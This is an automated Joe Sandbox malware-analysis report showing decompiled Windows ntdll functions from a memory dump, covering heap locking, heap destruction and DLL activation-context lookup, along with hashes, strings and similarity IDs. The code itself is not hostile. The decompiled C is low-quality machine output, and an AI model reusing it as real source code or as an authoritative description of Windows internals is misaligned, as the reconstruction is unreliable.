				intOrPtr* _t44;
				char* _t45;
				void* _t65;
				intOrPtr _t72;
				signed int _t73;
				intOrPtr _t74;
				void* _t82;
				signed char* _t87;
				signed char _t90;
				intOrPtr _t92;
				intOrPtr _t93;
				intOrPtr* _t94;
				signed int* _t95;

				_t93 = _a4;
				if( *((intOrPtr*)(_t93 + 8)) == 0xddeeddee) {
					E36BA9335(_t93, 0, __ecx);
					L6:
					_t44 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					if(_t44 != 0) {
						if( *_t44 == 0) {
							goto L7;
						}
						_t45 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						L8:
						if( *_t45 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
								E36B9F717(_t93);
							}
						}
						return 1;
					}
					L7:
					_t45 = 0x7ffe0380;
					goto L8;
				}
				if(( *(_t93 + 0x44) & 0x01000000) != 0) {
					_t94 =  *0x36bd376c; // 0x0
					 *0x36bd91e0(_t93);
					return  *_t94();
				}
				if( *((intOrPtr*)(_t93 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E36ADB910();
					} else {
						E36ADB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E36ADB910("Invalid heap signature for heap at %p", _t93);
					E36ADB910(", passed to %s", "RtlUnlockHeap");
					_push("\n");
					E36ADB910();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x36bd47a1 = 1;
						asm("int3");
						 *0x36bd47a1 = 0;
					}
					return 0;
				}
				if(( *(_t93 + 0x40) & 0x00000001) != 0) {
					goto L6;
				}
				_t92 =  *((intOrPtr*)(_t93 + 0xc8));
				 *((intOrPtr*)(_t93 + 0xe8)) =  *((intOrPtr*)(_t93 + 0xe8)) + 0xffff;
				_t13 = _t92 + 8;
				 *_t13 =  *((intOrPtr*)(_t92 + 8)) - 1;
				if( *_t13 != 0) {
					goto L6;
				}
				 *(_t92 + 0xc) =  *(_t92 + 0xc) & 0x00000000;
				_t87 = _t92 + 4;
				_t65 = 0xfffffffe;
				asm("lock cmpxchg [edx], ecx");
				_v12 = 0xffff;
				if(_t65 != 0xfffffffe) {
					if(( *_t87 & 0x00000001) != 0) {
						E36B7AA40(_t92);
					}
					_t72 =  *((intOrPtr*)(_t92 + 0x10));
					_v8 = _t72;
					if(_t72 == 0) {
						_v8 = E36B0FEC0(_t92);
					}
					_v16 = _v16 & 0x00000000;
					_t95 = _t92 + 4;
					_t73 = _v12;
					while(1) {
						_t90 = _t73 & 0x00000002 | 0x00000001;
						_t82 = _t90 + _t73;
						asm("lock cmpxchg [esi], ecx");
						if(_t73 == _t73) {
							break;
						}
						E36B0BAC0(_t82,  &_v16);
						_t73 =  *_t95;
					}
					_t93 = _a4;
					_t74 = _v8;
					if((_t90 & 0x00000002) != 0) {
						E36B0F300(_t92, _t74);
					}
				}
				goto L6;
			}

0x36b0da2a
0x36b0da35
0x36b4f408
0x36b0da90
0x36b0da96
0x36b0da9b
0x36b4f510
0x00000000
0x00000000
0x36b4f51f
0x36b0daa6
0x36b0daa9
0x36b4f537
0x36b4f53f
0x36b4f53f
0x36b4f537
0x00000000
0x36b0daaf
0x36b0daa1
0x36b0daa1
0x00000000
0x36b0daa1
0x36b0da42
0x36b4f413
0x36b4f41b
0x00000000
0x36b4f421
0x36b0da4f
0x36b4f432
0x36b4f451
0x36b4f456
0x36b4f434
0x36b4f449
0x36b4f44e
0x36b4f462
0x36b4f471
0x36b4f476
0x36b4f47b
0x36b4f48d
0x36b4f48f
0x36b4f496
0x36b4f497
0x36b4f497
0x00000000
0x36b4f49e
0x36b0da59
0x00000000
0x00000000
0x36b0da5b
0x36b0da66
0x36b0da6d
0x36b0da6d
0x36b0da71
0x00000000
0x00000000
0x36b0da73
0x36b0da77
0x36b0da7f
0x36b0da80
0x36b0da84
0x36b0da8a
0x36b4f4a8
0x36b4f4ab
0x36b4f4ab
0x36b4f4b0
0x36b4f4b3
0x36b4f4b8
0x36b4f4c1
0x36b4f4c1
0x36b4f4c4
0x36b4f4c8
0x36b4f4cb
0x36b4f4ce
0x36b4f4d5
0x36b4f4d8
0x36b4f4db
0x36b4f4e1
0x00000000
0x00000000
0x36b4f4e7
0x36b4f4ec
0x36b4f4ec
0x36b4f4f0
0x36b4f4f3
0x36b4f4f9
0x36b4f503
0x36b4f503
0x36b4f4f9
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 36B4F41B

Strings

HEAP[%wZ]: , xrefs: 36B4F444
HEAP: , xrefs: 36B4F451
Invalid heap signature for heap at %p, xrefs: 36B4F45D
, passed to %s, xrefs: 36B4F46C
RtlUnlockHeap, xrefs: 36B4F467

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
API String ID: 3446177414-3224558752
Opcode ID: efbdf8ebd6b1670b6b3f99cc7d80324e8f6ab4a1f82cd363beb0e1b352e23106
Instruction ID: e5cfa9f0cb438e858c6dbc1437567b120c6cd87c608e8c4361352d23e041b0dd
Opcode Fuzzy Hash: efbdf8ebd6b1670b6b3f99cc7d80324e8f6ab4a1f82cd363beb0e1b352e23106
Instruction Fuzzy Hash: B6412674A14760DFE712DF24C954B6ABBB8FF403A4F2085A9D90557281CB78D980DF92

Uniqueness

Uniqueness Score: -1.00%

Function 36B8ECD7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 36B8EDD0
RtlDebugPrintTimes.NTDLL ref: 36B8EE45

Strings

---------------------------------------, xrefs: 36B8EDF9
HEAP: , xrefs: 36B8ECDD
Entry Heap Size , xrefs: 36B8EDED
Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 36B8EDE3

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: DebugPrintTimes
String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
API String ID: 3446177414-1102453626
Opcode ID: cf3162690479afd73e16276cfeaee8e345a90f1897df5abe09332111e784a243
Instruction ID: 20b9591cc1edc67406449172401c7e22e71e7a1a25065c77777b1132c69857bf
Opcode Fuzzy Hash: cf3162690479afd73e16276cfeaee8e345a90f1897df5abe09332111e784a243
Instruction Fuzzy Hash: 17418D79E10262DFC704CF14C9A0959BBB6FF853947258069D504AF221DB31EC43CF92

Uniqueness

Uniqueness Score: -1.00%

Function 36B0DAC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84
timeCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E36B0DAC0(void* __ecx, intOrPtr _a4) {
				char _v5;
				intOrPtr* _t25;
				char* _t26;
				char _t28;
				intOrPtr _t53;
				intOrPtr* _t55;

				_t53 = _a4;
				_v5 = 0xff;
				if( *((intOrPtr*)(_t53 + 8)) == 0xddeeddee) {
					E36BA9109(_t53,  &_v5);
					L5:
					_t25 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					if(_t25 != 0) {
						if( *_t25 == 0) {
							goto L6;
						}
						_t26 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						L7:
						if( *_t26 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
								E36B9F2AE(_t53);
							}
						}
						_t28 = 1;
						L9:
						return _t28;
					}
					L6:
					_t26 = 0x7ffe0380;
					goto L7;
				}
				if(( *(_t53 + 0x44) & 0x01000000) != 0) {
					_t55 =  *0x36bd3768; // 0x0
					 *0x36bd91e0(_t53);
					_t28 =  *_t55();
					goto L9;
				}
				if( *((intOrPtr*)(_t53 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E36ADB910();
					} else {
						E36ADB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E36ADB910("Invalid heap signature for heap at %p", _t53);
					E36ADB910(", passed to %s", "RtlLockHeap");
					_push("\n");
					E36ADB910();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x36bd47a1 = 1;
						asm("int3");
						 *0x36bd47a1 = 0;
					}
					_t28 = 0;
					goto L9;
				} else {
					if(( *(_t53 + 0x40) & 0x00000001) == 0) {
						E36AEFED0( *((intOrPtr*)(_t53 + 0xc8)));
						 *((short*)(_t53 + 0xe8)) =  *((short*)(_t53 + 0xe8)) + 1;
					}
					goto L5;
				}
			}

0x36b0dac8
0x36b0dacb
0x36b0dad6
0x36b4f54e
0x36b0db0e
0x36b0db14
0x36b0db19
0x36b4f5ee
0x00000000
0x00000000
0x36b4f5fd
0x36b0db24
0x36b0db27
0x36b4f614
0x36b4f61c
0x36b4f61c
0x36b4f614
0x36b0db2d
0x36b0db2f
0x36b0db31
0x36b0db31
0x36b0db1f
0x36b0db1f
0x00000000
0x36b0db1f
0x36b0dae3
0x36b4f559
0x36b4f561
0x36b4f567
0x00000000
0x36b4f567
0x36b0daf0
0x36b4f578
0x36b4f597
0x36b4f59c
0x36b4f57a
0x36b4f58f
0x36b4f594
0x36b4f5a8
0x36b4f5b7
0x36b4f5bc
0x36b4f5c1
0x36b4f5d3
0x36b4f5d5
0x36b4f5dc
0x36b4f5dd
0x36b4f5dd
0x36b4f5e4
0x00000000
0x36b0daf6
0x36b0dafa
0x36b0db02
0x36b0db07
0x36b0db07
0x00000000
0x36b0dafa

APIs

RtlDebugPrintTimes.NTDLL ref: 36B4F561

Strings

HEAP[%wZ]: , xrefs: 36B4F58A
HEAP: , xrefs: 36B4F597
RtlLockHeap, xrefs: 36B4F5AD
Invalid heap signature for heap at %p, xrefs: 36B4F5A3
, passed to %s, xrefs: 36B4F5B2

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
API String ID: 3446177414-1222099010
Opcode ID: a2aa23e6af043cfc70012c291f81dc25b1483e72a8c8b9ae24a7f23b4a2a507d
Instruction ID: 406ee50daa462f4954e30db7c1834d908338c91075069e0150d60db248b1664b
Opcode Fuzzy Hash: a2aa23e6af043cfc70012c291f81dc25b1483e72a8c8b9ae24a7f23b4a2a507d
Instruction Fuzzy Hash: 6A3141759107A4AFEB12DB24C818F697FF8FF01694F004889E8014B6A1CB69E940CF52

Uniqueness

Uniqueness Score: -1.00%

Function 36AE9046 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199
timeCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E36AE9046(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				short _t95;
				intOrPtr _t110;
				short _t118;
				signed int _t131;
				intOrPtr _t136;
				intOrPtr _t140;
				intOrPtr _t146;
				intOrPtr* _t148;
				intOrPtr _t151;
				intOrPtr _t152;
				intOrPtr* _t154;
				void* _t156;

				_t141 = __edx;
				_push(0x154);
				_push(0x36bbbe98);
				E36B37C40(__ebx, __edi, __esi);
				 *(_t156 - 0xf0) = __edx;
				_t151 = __ecx;
				 *((intOrPtr*)(_t156 - 0xfc)) = __ecx;
				 *((intOrPtr*)(_t156 - 0xf8)) =  *((intOrPtr*)(_t156 + 8));
				 *((intOrPtr*)(_t156 - 0xe8)) =  *((intOrPtr*)(_t156 + 0xc));
				 *((intOrPtr*)(_t156 - 0xf4)) =  *((intOrPtr*)(_t156 + 0x10));
				 *((intOrPtr*)(_t156 - 0xe4)) = 0;
				 *((short*)(_t156 - 0xda)) = 0;
				 *(_t156 - 0xe0) = 0;
				 *((intOrPtr*)(_t156 - 0x140)) = 0x40;
				E36B28F40(_t156 - 0x13c, 0, "true");
				 *((intOrPtr*)(_t156 - 0x164)) = 0x24;
				 *((intOrPtr*)(_t156 - 0x160)) = 1;
				_t131 = 7;
				memset(_t156 - 0x15c, 0, _t131 << 2);
				_t146 =  *((intOrPtr*)(_t156 - 0xe8));
				_t152 = E36AF9870(1, _t151, 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
				if(_t152 >= 0) {
					if( *0x36bd65e0 == 0 || ( *(_t156 - 0xe0) & 0x00000001) != 0) {
						goto L1;
					} else {
						_t152 = E36AFA170(7, 0, 2,  *((intOrPtr*)(_t156 - 0xfc)), _t156 - 0x140);
						if(_t152 < 0) {
							goto L1;
						}
						if( *((intOrPtr*)(_t156 - 0x13c)) != 1) {
							L11:
							_t152 = 0xc0150005;
							goto L1;
						}
						if(( *(_t156 - 0x118) & 0x00000001) == 0) {
							if(( *(_t156 - 0x118) & 0x00000002) != 0) {
								 *(_t156 - 0x120) = 0xfffffffc;
							}
						} else {
							 *(_t156 - 0x120) =  *(_t156 - 0x120) & 0x00000000;
						}
						_t136 =  *((intOrPtr*)(_t156 - 0x114));
						_t95 =  *((intOrPtr*)(_t136 + 0x5c));
						 *((short*)(_t156 - 0xda)) = _t95;
						 *((short*)(_t156 - 0xdc)) = _t95;
						 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t136 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
						 *((intOrPtr*)(_t156 - 0xe8)) = _t156 - 0xd0;
						 *((short*)(_t156 - 0xea)) = 0xaa;
						_t152 = E36B05A40(_t141,  *(_t156 - 0xf0) & 0x0000ffff, _t156 - 0xec, 2, 0);
						if(_t152 < 0 || E36B004C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
							goto L1;
						} else {
							_t154 =  *0x36bd65e0; // 0x75eea680
							 *0x36bd91e0( *(_t156 - 0x120),  *(_t156 - 0xf0), _t156 - 0xe4);
							_t152 =  *_t154();
							 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
							if(_t152 < 0) {
								goto L1;
							} else {
								_t110 =  *((intOrPtr*)(_t156 - 0xe4));
								if(_t110 == 0xffffffff) {
									L26:
									 *((intOrPtr*)(_t156 - 4)) = 1;
									_t148 =  *0x36bd65e8;
									if(_t148 != 0) {
										 *0x36bd91e0(_t110);
										 *_t148();
									}
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									goto L1;
								}
								E36AFDC40(_t156 - 0x164, _t110);
								 *((intOrPtr*)(_t156 - 4)) = 0;
								if( *((intOrPtr*)(_t146 + 4)) != 0) {
									E36AF3B90(_t146);
								}
								_t149 =  *((intOrPtr*)(_t156 - 0xfc));
								_t152 = E36AF9870(0,  *((intOrPtr*)(_t156 - 0xfc)), 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
								 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
								if(_t152 < 0) {
									L25:
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									_t110 = E36B4247B();
									goto L26;
								} else {
									_t152 = E36AFA170(7, 0, 2, _t149, _t156 - 0x140);
									 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
									if(_t152 < 0) {
										goto L25;
									}
									if( *((intOrPtr*)(_t156 - 0x13c)) == 1) {
										_t140 =  *((intOrPtr*)(_t156 - 0x114));
										_t118 =  *((intOrPtr*)(_t140 + 0x5c));
										 *((short*)(_t156 - 0xda)) = _t118;
										 *((short*)(_t156 - 0xdc)) = _t118;
										 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t140 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
										if(E36B004C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
											goto L25;
										}
										_t152 = 0xc0150004;
										L24:
										 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
										goto L25;
									}
									_t152 = 0xc0150005;
									goto L24;
								}
							}
							goto L11;
						}
					}
				}
				L1:
				 *[fs:0x0] =  *((intOrPtr*)(_t156 - 0x10));
				return _t152;
			}

0x36ae9046
0x36ae9046
0x36ae904b
0x36ae9050
0x36ae9055
0x36ae905b
0x36ae905d
0x36ae9066
0x36ae906f
0x36ae9078
0x36ae9080
0x36ae9088
0x36ae908f
0x36ae9095
0x36ae90a9
0x36ae90b1
0x36ae90be
0x36ae90c6
0x36ae90cf
0x36ae90e2
0x36ae90f7
0x36ae90fb
0x36ae9118
0x00000000
0x36ae9123
0x36ae913b
0x36ae913f
0x00000000
0x00000000
0x36ae9147
0x36b4231f
0x36b4231f
0x00000000
0x36b4231f
0x36ae9154
0x36b42330
0x36b42336
0x36b42336
0x36ae915a
0x36ae915a
0x36ae915a
0x36ae9161
0x36ae9167
0x36ae916b
0x36ae9172
0x36ae9182
0x36ae918e
0x36ae9199
0x36ae91ba
0x36ae91be
0x00000000
0x36ae91e0
0x36b42358
0x36b42360
0x36b42368
0x36b4236a
0x36b42372
0x00000000
0x36b42378
0x36b42378
0x36b42381
0x36b42458
0x36b42458
0x36b4245b
0x36b42463
0x36b42468
0x36b4246e
0x36b4246e
0x36b424a7
0x00000000
0x36b424a7
0x36b4238f
0x36b42396
0x36b4239c
0x36b4239f
0x36b4239f
0x36b423bb
0x36b423c8
0x36b423ca
0x36b423d2
0x36b4244c
0x36b4244c
0x36b42453
0x00000000
0x36b423d4
0x36b423e7
0x36b423e9
0x36b423f1
0x00000000
0x00000000
0x36b423f9
0x36b42402
0x36b42408
0x36b4240c
0x36b42413
0x36b42423
0x36b4243f
0x00000000
0x00000000
0x36b42441
0x36b42446
0x36b42446
0x00000000
0x36b42446
0x36b423fb
0x00000000
0x36b423fb
0x36b423d2
0x00000000
0x36b42372
0x36ae91be
0x36ae9118
0x36ae90fd
0x36ae9102
0x36ae910e

APIs

RtlDebugPrintTimes.NTDLL ref: 36B42360

Strings

@, xrefs: 36AE9095
$, xrefs: 36AE90B1

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$@
API String ID: 3446177414-1194432280
Opcode ID: 0d8c65f368f0a0896ffef48a4e977f6bdabb3524251a4da921807dbc715f43c2
Instruction ID: b5a47d8e6f9a520d09c8bc438c123b8bb7d7453aa1a1671ee8e7468bbf69ff3b
Opcode Fuzzy Hash: 0d8c65f368f0a0896ffef48a4e977f6bdabb3524251a4da921807dbc715f43c2
Instruction Fuzzy Hash: 5B8139B1D002699BDB22DF54CC44BDEB7B8AF08750F0041EAEA09B7240E7709E85DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 36B14C3D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117
timeCOMMON

Download Yara Rule

C-Code - Quality: 36%

			E36B14C3D(void* __ecx) {
				char _v8;
				intOrPtr* _t24;
				intOrPtr _t27;
				intOrPtr _t36;
				void* _t39;
				intOrPtr _t40;
				void* _t42;
				void* _t45;
				void* _t47;
				intOrPtr* _t48;
				void* _t49;
				intOrPtr _t51;

				_push(__ecx);
				_t45 = 0;
				_t42 = __ecx;
				_t51 =  *0x36bd65e4; // 0x75ecf0e0
				if(_t51 == 0) {
					L10:
					return _t45;
				}
				_t40 =  *((intOrPtr*)(__ecx + 0x18));
				_t36 =  *0x36bd5b24; // 0x68b2ce0
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t36) {
					_t24 =  *((intOrPtr*)(_t42 + 0x28));
					if(_t42 == _t36) {
						_push("true");
						_pop(_t47);
						if( *_t24 == _t47) {
							_t39 = 0x3f;
							if( *((intOrPtr*)(_t24 + 2)) == _t39 &&  *((intOrPtr*)(_t24 + 4)) == _t39 &&  *((intOrPtr*)(_t24 + 6)) == _t47 &&  *((intOrPtr*)(_t24 + 8)) != 0 &&  *((short*)(_t24 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t24 + 0xc)) == _t47) {
								_t24 = _t24 + 8;
							}
						}
					}
					_t48 =  *0x36bd65e4; // 0x75ecf0e0
					 *0x36bd91e0(_t40, _t24,  &_v8);
					_t45 =  *_t48();
					if(_t45 >= 0) {
						L8:
						_t27 = _v8;
						if(_t27 != 0) {
							if( *((intOrPtr*)(_t42 + 0x48)) != 0) {
								E36AE26A0(_t27,  *((intOrPtr*)(_t42 + 0x48)));
								_t27 = _v8;
							}
							 *((intOrPtr*)(_t42 + 0x48)) = _t27;
						}
						if(_t45 < 0) {
							if(( *0x36bd37c0 & 0x00000003) != 0) {
								E36B5E692("minkernel\\ntdll\\ldrsnap.c", 0x2eb, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t45);
							}
							if(( *0x36bd37c0 & 0x00000010) != 0) {
								asm("int3");
							}
						}
						goto L10;
					}
					if(_t45 != 0xc000008a) {
						if(_t45 != 0xc000008b && _t45 != 0xc0000089 && _t45 != 0xc000000f && _t45 != 0xc0000204 && _t45 != 0xc0000002) {
							if(_t45 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x36bd37c0 & 0x00000005) != 0) {
						_push(_t45);
						_t18 = _t42 + 0x24; // 0x123
						E36B5E692("minkernel\\ntdll\\ldrsnap.c", 0x2ce, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t18);
						_t49 = _t49 + 0x1c;
					}
					_t45 = 0;
					goto L8;
				} else {
					goto L10;
				}
			}

0x36b14c42
0x36b14c47
0x36b14c4a
0x36b14c4c
0x36b14c52
0x36b14cb8
0x36b14cbe
0x36b14cbe
0x36b14c5a
0x36b14c5d
0x36b14c69
0x36b14c6f
0x36b14c74
0x36b14cd4
0x36b14cd6
0x36b14cda
0x36b533b9
0x36b533be
0x36b533f7
0x36b533f7
0x36b533be
0x36b14cda
0x36b14c76
0x36b14c84
0x36b14c8c
0x36b14c90
0x36b14ca9
0x36b14ca9
0x36b14cae
0x36b14ce4
0x36b14cee
0x36b14cf3
0x36b14cf3
0x36b14ce6
0x36b14ce6
0x36b14cb2
0x36b53463
0x36b5347b
0x36b53480
0x36b5348a
0x36b53490
0x36b53490
0x36b5348a
0x00000000
0x36b14cb2
0x36b14c98
0x36b14cc5
0x36b53429
0x00000000
0x00000000
0x36b5342f
0x36b14cc5
0x36b14ca1
0x36b53434
0x36b53435
0x36b5344f
0x36b53454
0x36b53454
0x36b14ca7
0x00000000
0x00000000
0x00000000
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 36B14C84

Strings

Querying the active activation context failed with status 0x%08lx, xrefs: 36B53466
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 36B53439
minkernel\ntdll\ldrsnap.c, xrefs: 36B5344A, 36B53476
LdrpFindDllActivationContext, xrefs: 36B53440, 36B5346C

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-3779518884
Opcode ID: 8a487727bd23e2e7a82d76ccdb2ed4f2b04127cf25f3f016c88792f62b4ea991
Instruction ID: 9f5e1324d58866f088d87fed2a8a29e414cf559422beddd71f0118e96bbd3e8b
Opcode Fuzzy Hash: 8a487727bd23e2e7a82d76ccdb2ed4f2b04127cf25f3f016c88792f62b4ea991
Instruction Fuzzy Hash: F23119BAD00371BFFB119B05C884A56B6A4FB013D8F529166DA0467151E7A59CC8CFF1

Uniqueness

Uniqueness Score: -1.00%

Function 36ADF8B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263
timeCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E36ADF8B0(signed int __edx, signed int _a4) {
				signed int _v8;
				void* _v28;
				void* _v54;
				void* _v60;
				void* _v64;
				char _v88;
				void* _v90;
				signed int _v92;
				char _v96;
				void* _v100;
				void* _v104;
				void* _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t73;
				signed int* _t86;
				signed int _t87;
				signed int _t91;
				char* _t92;
				char _t96;
				void* _t102;
				signed int* _t105;
				intOrPtr _t106;
				void* _t107;
				signed int* _t110;
				signed int _t111;
				char* _t118;
				signed int _t121;
				signed int _t127;
				void* _t128;
				void* _t129;
				signed int _t131;
				signed int _t132;
				void* _t139;
				signed int _t161;
				void* _t162;
				void* _t164;
				intOrPtr* _t166;
				void* _t169;
				signed int* _t170;
				signed int* _t171;
				signed int _t174;
				signed int _t176;

				_t158 = __edx;
				_t176 = (_t174 & 0xfffffff8) - 0x64;
				_v8 =  *0x36bdb370 ^ _t176;
				_push(_t128);
				_t161 = _a4;
				if(_t161 == 0) {
					__eflags =  *0x36bd6960 - 2;
					if( *0x36bd6960 >= 2) {
						_t64 =  *[fs:0x30];
						__eflags =  *(_t64 + 0xc);
						if( *(_t64 + 0xc) == 0) {
							_push("HEAP: ");
							E36ADB910();
						} else {
							E36ADB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(HeapHandle != NULL)");
						E36ADB910();
						__eflags =  *0x36bd5da8;
						if(__eflags == 0) {
							_t139 = 2;
							E36B9FC95(_t128, _t139, _t161, __eflags);
						}
					}
					L26:
					_t62 = 0;
					L27:
					_pop(_t162);
					_pop(_t164);
					_pop(_t129);
					return E36B24B50(_t62, _t129, _v8 ^ _t176, _t158, _t162, _t164);
				}
				if( *((intOrPtr*)(_t161 + 8)) == 0xddeeddee) {
					_t73 =  *[fs:0x30];
					__eflags = _t161 -  *((intOrPtr*)(_t73 + 0x18));
					if(_t161 ==  *((intOrPtr*)(_t73 + 0x18))) {
						L30:
						_t62 = _t161;
						goto L27;
					}
					_t141 =  *(_t161 + 0x10);
					__eflags =  *(_t161 + 0x10);
					if( *(_t161 + 0x10) != 0) {
						_t158 = _t161;
						E36B878DE(_t141, _t161, 0, "true", 0);
					}
					E36ADFD8E(_t161, _t158);
					E36BA02EC(_t161);
					_t158 = 1;
					E36AD918A(_t161, 1, 0, 0);
					E36BA8E26(_t161);
					goto L26;
				}
				if(( *(_t161 + 0x44) & 0x01000000) != 0) {
					_t166 =  *0x36bd3758; // 0x0
					 *0x36bd91e0(_t161);
					_t62 =  *_t166();
					goto L27;
				}
				_t7 = _t161 + 0x58; // 0x8953046a
				_t147 =  *_t7;
				if( *_t7 != 0) {
					_t158 = _t161;
					E36B878DE(_t147, _t161, 0, "true", 0);
				}
				E36ADFD8E(_t161, _t158);
				if(( *(_t161 + 0x40) & 0x61000000) != 0) {
					__eflags =  *(_t161 + 0x40) & 0x10000000;
					if(( *(_t161 + 0x40) & 0x10000000) != 0) {
						goto L5;
					}
					_t127 = E36B8F85F(_t161);
					__eflags = _t127;
					if(_t127 == 0) {
						goto L30;
					}
					goto L5;
				} else {
					L5:
					if(_t161 ==  *((intOrPtr*)( *[fs:0x30] + 0x18))) {
						goto L30;
					} else {
						E36AEFED0(0x36bd4800);
						E36ADFAEC(_t161);
						_push(0x36bd4800);
						E36AEE740(_t161);
						_t86 = _t161 + 0x9c;
						_t131 =  *_t86;
						while(_t86 != _t131) {
							_t87 = _t131;
							_t158 =  &_v92;
							_t131 =  *_t131;
							_v92 = _t87 & 0xffff0000;
							_v96 = 0;
							E36ADFABA( &_v92,  &_v96, 0x8000);
							_t91 = E36AF3C40();
							__eflags = _t91;
